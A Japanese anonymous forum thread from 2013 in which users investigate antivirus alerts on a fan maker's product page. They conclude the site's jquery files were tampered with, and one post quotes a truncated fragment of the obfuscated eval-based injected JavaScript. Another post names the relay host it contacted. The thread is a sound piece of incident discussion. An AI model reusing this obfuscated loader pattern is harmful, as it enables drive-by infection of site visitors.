この↓ページからウィルスが検出されるんだけど俺だけ?

このエントリーをはてなブックマークに追加
1Ψ
サーキュレーター探してたらいきなりMSEが開いた。
トロイの木馬ってのを検出して自動で削除画面が出る。
更新しても、そのたびに出る。
俺だけ?それともこの会社のページがだれかにやられたの?

株式会社ナカトミ | 45cm工場扇 OPF-45S
http://www.nakatomi-sangyo.com/fan/opf-45s.html
2Ψ:2013/06/13(木) 00:04:03.97 ID:Sk/ZQY7G0
キングソフトだけどウイルスなんてでてないよ?
誤検出だろ
3Ψ:2013/06/13(木) 00:04:13.21 ID:AJqtFds10
Trojan:JS Blacole.CZっとか名前はでてる
他にも一緒に入れられる?MSEはそれしか検出してないんだけど。
4Ψ:2013/06/13(木) 00:05:26.60 ID:AJqtFds10
正確にはTrojan:JS BlacoleRef.CZだった
ぐぐるとトロイの木馬らしいんだけど。
5Ψ:2013/06/13(木) 00:06:21.42 ID:v+Zf4w8h0
おまえ、AVGを使ってるだろ
6Ψ:2013/06/13(木) 00:08:42.57 ID:v+Zf4w8h0
たぶん、誤検出だろう
virustotalで検出なし
https://www.virustotal.com/ja/url/f51788437a962696445b23bdd50fe0f6d3c8ce26dcf4944b1a65f6324b1a0885/analysis/1371049434/

urlvoidでAVGが検出
http://www.urlvoid.com/scan/nakatomi-sangyo.com/
7Ψ:2013/06/13(木) 00:09:17.40 ID:XSt8/brE0
ネクサス7でウイルスバスターだが

何にも問題なし

大丈夫ですよ
8Ψ:2013/06/13(木) 00:09:37.11 ID:0tEkFhwG0
AVGの誤検出はもはや神レベルだからな
9Ψ:2013/06/13(木) 00:10:33.67 ID:46sBhaUU0
MSEで引っかかった
10Ψ:2013/06/13(木) 00:11:31.47 ID:v+Zf4w8h0
>>1にMSEって書いてたスマンw
11Ψ:2013/06/13(木) 00:17:46.24 ID:POf2J/is0
MSEだけど反応したな
12 忍法帖【Lv=29,xxxPT】(1+0:5) 【中国電 68.7 %】 :2013/06/13(木) 00:20:15.26 ID:yPYeRqJV0
俺もバスターだが出ないな…
ソースコードも見て見たが、別に問題も無さそうな…
13Ψ:2013/06/13(木) 00:21:48.16 ID:0tEkFhwG0
アバストのやついないのか
14Ψ:2013/06/13(木) 00:22:54.79 ID:POf2J/is0
どのページに行っても反応するなw
15Ψ:2013/06/13(木) 00:24:26.29 ID:AJqtFds10
誤検出なのかな。おまいらありがとう。
16Ψ:2013/06/13(木) 00:24:55.20 ID:LyLj8QGE0
avira反応したw
17Ψ:2013/06/13(木) 00:48:11.79 ID:q8WoRkFC0
どうやらこの2つがトロイにやられているらしい。
ttp://www.nakatomi-sangyo.com/js/jquery.min.js
ttp://www.nakatomi-sangyo.com/js/jquery-ui.min.js

中身はこんな感じ(一部)
/*0c0896*/
bv=(5-3-1);aq="0"+"x";sp="spli"+"t";ff=String.fromCharCode;w=window;z="dy"
;try{document["\x62o"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}cat
ch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d
中略
/*/0c0896*/


本当のjquery.min.jsはこんな感じ。↓もちろんクリックしても無害
http://ajax.googleapis.com/ajax/libs/jquery/1.7.0/jquery.min.js
18Ψ:2013/06/13(木) 00:51:49.06 ID:+Td5mkmj0
Avira、bitdefender 反応なしだわ
19Ψ:2013/06/13(木) 01:32:19.22 ID:heZEp7FV0
http://massnameserver.com/relay.php ってのにつなぎにいったぞ
たぶん用ないだろ、本来
20Ψ:2013/06/13(木) 02:04:25.98 ID:VVdqs8460
http://check.gred.jp/

ttp://www.nakatomi-sangyo.com/support/index.html
で引っかかったならよらないほうがいい
改ざんされた恐れがあるってよ
21Ψ:2013/06/13(木) 02:09:11.66 ID:POf2J/is0
>>20
あれ・・・なんかリンク色が・・・









踏んでもうてるがなw
22Ψ:2013/06/13(木) 02:15:33.28 ID:VVdqs8460
MSEって仕事するんだな
勘違いしてましたMSさんごめんなさい
23Ψ:2013/06/13(木) 02:19:49.56 ID:VVdqs8460
http://www.aguse.jp/?url=www.nakatomi-sangyo.com%2Fsupport%2Findex.html+
マルウェア Trojan.JS.Agent.cbn だって
24Ψ:2013/06/13(木) 07:21:46.51 ID:FFZoWoFx0
踏んだらどうなるの?
25Ψ:2013/06/13(木) 07:59:46.29 ID:tUM5+d+K0
http://www.avira.com/ja/support-threats-summary?tid=8084&threat=JS%252FBlacoleRef.DD.17
26Ψ:2013/06/13(木) 08:25:24.61 ID:V2ITkPWf0
>>1
お気に入りに追加したらビールサービスしてくれたよ…
ちょっと輩言ってくる…手伝ってくれる?
27Ψ:2013/06/13(木) 08:39:43.33 ID:/0ODKF0j0
>>1
おまえだけw
28Ψ:2013/06/13(木) 09:49:46.85 ID:R73wEozC0
おれはウイルスセキュリティ0だから危ないとこには近づかない。
29Ψ:2013/06/13(木) 10:04:39.18 ID:q8WoRkFC0
とりあえずサイト運営者には連絡しておいた。
これをなかったコトにするのか、きちんとHPでアナウンスして対応するのか
対応次第では企業姿勢が問われるな。
30Ψ:2013/06/13(木) 10:08:44.43 ID:q8WoRkFC0
10:00
とりあえず

ttp://www.nakatomi-sangyo.com/js/jquery.min.js
ttp://www.nakatomi-sangyo.com/js/jquery-ui.min.js

この2つのファイルは消した模様。
トップページなどにウィルス感染の告知など無し
31Ψ
コード貼られただけじゃないかな?